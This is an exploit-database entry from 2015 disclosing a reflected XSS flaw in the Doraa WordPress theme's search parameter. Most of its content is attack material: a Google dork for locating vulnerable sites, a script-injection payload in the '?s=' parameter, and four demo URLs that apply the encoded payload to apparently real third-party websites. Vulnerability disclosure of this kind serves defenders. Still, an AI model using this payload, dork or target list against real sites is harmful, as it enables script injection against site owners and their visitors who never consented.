Wordpress theme Doraa XSS Vulnerability

2015.08.25
Credit: R3NW4
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: Themes by Bons.us

# Exploit Title: [Wordpress theme Doraa XSS Vulnerability] # Google Dork: [Themes by Bons.us] # Date: [24-8-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Versions: [ 1.0 and lower ] # Greetz: XSSposed.org - All Kurdish Hackers ----------------------- Exploit: site.com/?s='"><script>alert(%2FXSSPOSED%2F)<%2Fscript> ------------------------- DemoZ: http://hotcarsreviXXews.info/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://carspricereXviews.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://20164runXner.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://www.interiorandfXurniture.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E ------------------------ # https://twitter.com/R3NW4


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top